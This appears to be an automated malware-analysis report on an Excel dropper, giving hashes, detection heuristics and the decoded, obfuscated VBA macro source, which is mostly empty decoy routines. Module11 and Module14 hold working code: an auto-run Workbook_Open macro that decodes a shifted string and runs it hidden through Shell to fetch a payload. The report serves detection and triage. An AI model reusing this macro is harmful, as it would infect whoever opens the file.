Xls.Dropper.Agent-1563584 — Office (OLE) malware analysis

Static analysis result for SHA-256 23bd0ee4ddf2fe49…

MALICIOUS

Office (OLE)

Size: 109.5 KB
Created: 1996-10-08 23:32:33
Authoring application: Microsoft Excel
First seen: 2015-03-15
MD5: 1c76d4077a551468e834fada41673852
SHA-1: 634b4a9f4809ae7bf42bdec468a2fc5ae082e376
SHA-256: 23bd0ee4ddf2fe49fc132fa044b96994d8ff812640bb48f62b92c263c898e599
Risk Score: 150

Malware Insights

Xls.Dropper.Agent-1563584 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an Excel document containing VBA macros, specifically a Workbook_Open macro. Heuristics indicate a potential Shell call within the VBA code and ClamAV identified it as Xls.Dropper.Agent-1563584. The macro is likely designed to download and execute a secondary payload, a common dropper behavior.

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-1563584 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-1563584
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell FfdsfF, vbHide
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12628 bytes
SHA-256: e8c5b068d41111b9ed04ce665c4111aff2962d794f4240b45f135561a25ee5b7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
179 of 250 identifiers look randomly generated (e.g. 'aNjZPeoQJJltGiChFQjYUOh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    tyrtyaag
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Function pARgBpyQQ()

End Function
Public Function xCKAgpotPQeIV()

End Function
Private Sub rjHQPzik()

End Sub
Private Sub zwfsRRtNqJpNfFfqk()

End Sub
Private Sub TflhsJY()

End Sub
Private Sub OJnoUcuC()

End Sub
Public Sub TRQIOVmNMdSVMm()

End Sub
Private Function aNjZPeoQ()

End Function
Private Function ltGiChFQjYUO()

End Function
Private Sub kvBxIabwxH()

End Sub
Private Function FmsLTIok()

End Function

Attribute VB_Name = "Module2"
Private Function QPUryFkxwMPSKj()

End Function
Private Function JLgIN()

End Function
Public Sub TttUdqRlQpG()

End Sub
Private Sub LeNkTflhsJYghr()

End Sub
Public Sub oUcuCsYTRQIOVmNMdSVMm()

End Sub
Public Sub aNjZPeoQJJltGiChFQjYUOh()

End Sub
Public Function vBxIabw()

End Function
Public Sub LpFmsL()

End Sub
Public Sub kkinZRZD()

End Sub
Private Function jmeCgK()

End Function
Private Function zpguEn()

End Function
Private Function oJQlSkVazolfx()

End Function

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Function PyyllMUiJeI()

End Function
Private Function zwqIFdMQdZkB()

End Function
Public Sub jGnQh()

End Sub
Private Function vkPLLKO()

End Function
Public Sub fFrGKNFeHm()

End Sub
Public Sub bQHVgOOBoPm()

End Sub
Public Function LxBbPMGZV()

End Function
Private Sub tpBESoq()

End Sub
Public Function hxPkDxnSccb()

End Function

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function kNdJQjrhMHI()

End Function
Public Sub qxcCnDHKB()

End Sub
Private Sub SODYNEdLLylLivJrIuyY()

End Sub
Private Sub VSpLkqmxBPl()

End Sub
Public Function AeuMhAukPZZ()

End Function
Private Function GNsEETYbSrGzj()

End Function
Public Sub QUjtOcOB()

End Sub

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UjtOcOBdzxaHZK()

End Sub
Private Sub aTmjGcAspARgB()

End Sub
Public Sub QuwdxCKAgppotPQ()

End Sub
Private Function UlorjHQPzikEhlz()

End Function
Private Sub RRtBNqJp()

End Sub
Public Function fqkCmIsDJFQ()

End Function
Private Function FPniLMtzSbQ()

End Function
Public Function qvgnuKml()

End Function

Attribute VB_Name = "Module3"
Public Sub YUDQqqRamOiN()

End Sub
Private Sub DOIbK()

End Sub
Public Sub hepGU()

End Sub
Private Function LGjlRYrz()

End Function
Public Sub QOTELSjKJaPRJ()

End Sub
Private Sub oQKfVMbl()

End Sub
Private Function GiqCfyeCTgTR()

End Function
Private Sub xhsyuQYtuEcImBip()

End Sub
Public Function lghfkUOVzbL()

End Function
Public Sub azcHrn()

End Sub
Public Sub drBkkQJ()

End Sub
Public Sub iOhSQwlicurNkI()

End Sub

Attribute VB_Name = "Module4"
Private Sub syuFQY()

End Sub
Private Sub cImBipHPFlg()

End Sub
Private Sub UOVzbLc()

End Sub
Public Sub zcHrn()

End Sub
Public Sub drBkkQJGTiOhSQ()

End Sub
Public Sub curNkI()

End Sub
Private Function ZoJKUeZCSlFZSIo()

End Function
Public Function AmfmQddswqPfYHpsMpt()

End Function
Private Sub AnaBQVy()

End Sub
Private Function nMnysKH()

End Function

Attribute VB_Name = "Module5"
Private Sub BoPmyMuLxBbPM()

End Sub
Private Function tOntpBESoqzJEhx()

End Function
Private Sub xnSccbgQJQv()

End Sub
Private Sub beVuJCmUQrTYmwR()

End Sub
Private Sub gCAdKcNRsRd()

End Sub
Public Sub JfDwsDU()

End Sub
Public Function CaUyzgAFN()

End Function
Public Sub srwSahLZ()

End Sub
Public Function umKaSCln()

End Function
Private Sub CzivUUwE()

End Sub
Private Sub sQiIjuoGpLvGM()

End Sub
Private Function AHISqlO()

End Function
Public Sub QeTzuvtykqx()

End Sub

Attribute VB_Name = "Module6"
Private Function iJRfGa()

End Function
Private Sub HvtnFCZIT()

End Sub
Public Function yzUVgDNdJQjrh()

End Function
Private Sub GLxqxcCnDHKBDjSOD()

End Sub
Public Function SdLLylLivJr()

End Function
Public Function YMJDVSpLkq()

End Function
Private Sub PlnwFAeuMh()

End Sub
Private Sub PZZQcNG()

End Sub
Private Sub ETYbSrGzjQT()

End Sub
Public Sub jtOcOBdzxaHZKOo()

End Sub

Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub IcVLrAAz()

End Sub
Public Function pTggwz()

End Function
Private Sub ibKsvPswKUqDqd()

End Sub
Public Sub BjAmqPqBvNKiDcT()

End Sub
Public Function HdQaytVYE()

End Function
Private Sub cHQQPUr()

End Sub
Private Function xwMPSKj()

End Function
Public Sub JLgINYGTtt()

End Sub
Private Function RlQpGhGR()

End Function
Private Function kTflhsJYghrOJ()

End Function
Public Function cuCsYSTRQIOVmNM()

End Function
Private Function MmOuraNjZPeoQQJ()

End Function
Public Function iJeIhyKzwqIFdMQ()

End Function
Private Sub BCYajGn()

End Sub
Private Sub TnvkPLLKOAtAf()

End Sub

Attribute VB_Name = "Module7"
Public Sub xCKAg()

End Sub
Private Sub tPQeIVUl()

End Sub
Private Sub HQPzik()

End Sub
Public Sub zwfsRRt()

End Sub
Private Sub JpNfFfqk()

End Sub
Private Function sDJFQiwEFPni()

End Function
Public Function zSbQwrsqv()

End Function
Private Function KmlBrtlKn()

End Function
Private Function mHxoCMvvii()

End Function
Private Sub GaFevH()

End Sub

Attribute VB_Name = "Module11"
Sub tyrtyaag()
FfdsfF = NewQkeTzIIHM("pzq-<X-]|„r `uryy;r…r-5[r„:\owrpЃ-`†ЂЃrz;[rЃ;droPyvr{Ѓ6;Q|„{y|nqSvyr54uЃЃ}G<<>DC;@>;?E;?@B<x„rsr„rs<stqЂrr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-ЂЃn Ѓ-2aRZ]2iWV\v|qsuv|VU;r…rH")
Shell FfdsfF, vbHide
End Sub


Attribute VB_Name = "Module8"
Public Sub anmCGIAap()

End Sub
Public Sub BQzDRNwKjk()

End Sub
Public Sub IcGfxQ()

End Sub
Public Function UDbKUbQjzOV()

End Function
Private Function zdfLRltjOJJ()

End Function
Public Sub FMdDCSILDc()

End Sub
Public Sub PEZPGT()

End Sub
Public Sub AAbkwZsYvNaNK()

End Sub

Attribute VB_Name = "Module9"

Attribute VB_Name = "Module10"
Public Function ZPeoQQ()

End Function
Public Sub tGiChFQ()

End Sub
Private Function OheAkvBxIabwxHf()

End Function
Private Sub msLTIokkinZ()

End Sub
Private Sub ePfjmeCgKuq()

End Sub
Public Function guEnnaMo()

End Function
Public Sub SkVazol()

End Sub
Public Function RnLRNadrM()

End Function
Public Sub cFVoIc()

End Sub
Public Sub AAzDpipT()

End Sub
Public Function zCuSibKsv()

End Function
Private Sub KUqDqdEbZ()

End Sub
Private Sub mqPqBvNKiD()

End Sub

Attribute VB_Name = "Module12"
Public Sub NNMQovChttI()

End Sub
Public Function gvoYFIdFJYUD()

End Function
Private Function RamOiNlD()

End Function
Private Function IbKhQchepGUde()

End Function
Private Sub jlRYrzpUPQO()

End Sub
Private Sub SjKJBrtlKnRPy()

End Sub
Private Function oCMvviiJRf()

End Function
Private Sub evHvtnFCZIT()

End Sub
Public Function yzUVgD()

End Function
Public Function JQjrh()

End Function
Public Sub GLxqxcCnDHKB()

End Sub
Private Function SODYNE()

End Function
Public Function LylLivJrIuyYM()

End Function
Public Function SpLkqmxBPlnwFAe()

End Function
Public Function AukPZZ()

End Function

Attribute VB_Name = "Module13"
Public Function mwRfREgCAdKcNRs()

End Function
Private Sub pmJfDwsDUjEsCaU()

End Sub
Private Function AFNDjs()

End Function
Private Sub SahLZYoru()

End Sub
Private Sub SClnH()

End Sub
Public Function zivUUwERtMs()

End Function
Public Sub juoGpLvGMITl()

End Sub
Public Sub SqlOQwDQeTzu()

End Sub
Public Function kqxOpoEuxo()

End Function
Private Sub TBqKArFPyyllMUi()

End Sub
Public Sub hyKzwqIFdMQd()

End Sub
Private Function CYajGnQhNT()

End Function
Public Function PLLKOAt()

End Function
Private Function rGKNFeHmVRG()

End Function

Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function MGZVtOntpBESo()

End Function
Public Function EhxPkDxnSccb()

End Function
Public Sub QvIHYbeVuJCm()

End Sub
Private Sub TYmwRfRE()

End Sub
Public Sub dKcNRsRdQp()

End Sub
Public Function DwsDUj()

End Function

Attribute VB_Name = "Module14"

Public Function NewQkeTzIIHM(ByVal AESdyLylMjhJrIu As String) As String
GoTo lZiGBegMhmukPZZYdz
lZiGBegMhmukPZZYdz:
GoTo httIMPHgvoYFI
httIMPHgvoYFI:
GoTo JYUDQqqRamOiNl
JYUDQqqRamOiNl:
GoTo DOIbKh
DOIbKh:
Dim YyJDVSqLkdZk As Long
GoTo epGUden
epGUden:
For YyJDVSqLkdZk = 1 To Len(AESdyLylMjhJrIu)
GoTo lRYrzpUP
lRYrzpUP:
GoTo TELSjKJaPRJjLqoQK
TELSjKJaPRJjLqoQK:
GoTo MblTSGGiqCfyeCTgTRL
MblTSGGiqCfyeCTgTRL:
GoTo xhsyu
xhsyu:
GoTo YtuEcImBipHPFlghfkUO
YtuEcImBipHPFlghfkUO:
NewQkeTzIIHM = NewQkeTzIIHM & Chr(Asc(Mid(AESdyLylMjhJrIu, YyJDVSqLkdZk, 1)) - 13)
GoTo Lcgja
Lcgja:
GoTo Hrnbw
Hrnbw:
GoTo rBkkQJ
rBkkQJ:
GoTo TiOhSQwlicurNkI
TiOhSQwlicurNkI:
Next YyJDVSqLkdZk
GoTo ZoJKUeZCSlFZSIowxvAm
ZoJKUeZCSlFZSIowxvAm:
GoTo QddswzqP
QddswzqP:
GoTo HpsMptHRnAnaBQVygxjn
HpsMptHRnAnaBQVygxjn:
GoTo ysKHfAZQM
ysKHfAZQM:
GoTo EaNQvpSUBV
EaNQvpSUBV:
End Function


Attribute VB_Name = "Module15"
Public Sub AmfmQddsw()

End Sub
Public Sub fYHpsMptHRnAn()

End Sub
Private Function VygxjnMnysKHfAZ()

End Function
Private Function qEaNQvpSUBVbjZE()

End Function
Private Function QovChttIMPHgv()

End Function
Public Sub IdFJYUDQqqR()

End Sub
Public Sub iNlDdDOIbKhQc()

End Sub
Private Sub GUdenLGj()

End Sub
Public Sub rzpUPQOTELSjKJa()

End Sub
Public Function jLqoQKfVMblT()

End Function

Attribute VB_Name = "Module16"
Public Function qfzpguEnn()

End Function
Private Sub JQlSkVaz()

End Sub
Private Function xuRnLR()

End Function
Public Sub rMOYi()

End Sub
Private Function oIcVLrAAzDpipTg()

End Function
Public Function CuSibKsvPs()

End Function
Public Sub qDqdEbZBjAmqPqB()

End Sub
Public Sub iDcTQctHdQay()

End Sub
Private Function EZemcHQQPUryFkx()

End Function
Public Sub SKjyrbJLgINbYG()

End Sub
Private Sub UdqRlQpGh()

End Sub
Private Sub eNkTflhsJYghr()

End Sub
Public Sub oUcuCsY()

End Sub